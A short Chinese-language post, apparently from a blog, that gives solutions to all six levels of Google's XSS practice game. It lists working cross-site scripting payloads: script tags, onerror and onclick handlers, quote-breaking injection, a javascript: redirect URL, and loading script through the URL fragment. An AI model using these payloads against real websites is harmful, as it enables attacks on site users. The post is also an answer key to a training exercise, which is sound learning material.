网上总在那说XSS各种原理。。但是毛爷爷说的好,实践出真知。
谷歌就很务实。https://xss-game.appspot.com/level1 通过这个网站6道题目来亲身感受下怎么XSS。
后面是答案
第一关,反射型
一个搜索框
https://xss-game.appspot.com/level1/frame?query=xxx
https://xss-game.appspot.com/level1/frame?query=<script>alert(“show”)</script>
第二关,持久型 ,利用onerror
<img src=”/static/level32_icon.png” onerror=”alert(‘dfd’)” />
第三关
直接改了div值
<div class=”tab active” id=”tab3″ onclick=”alert(‘ccc’)”>Image 3</div>
第四关
提示<foo bar=’z’> foo bar=’z’
‘missing ) after argument list
3’); alert(‘XSS 等价于 3%27)%3b+alert(%27XSS
第五关
https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert(1)
第六关
方法1 https://xss-game.appspot.com/level6/frame#data:text/plain,alert(‘xss’)
方法2 https://xss-game.appspot.com/level6/frame#Https://google.com/jsapi?callback=alert
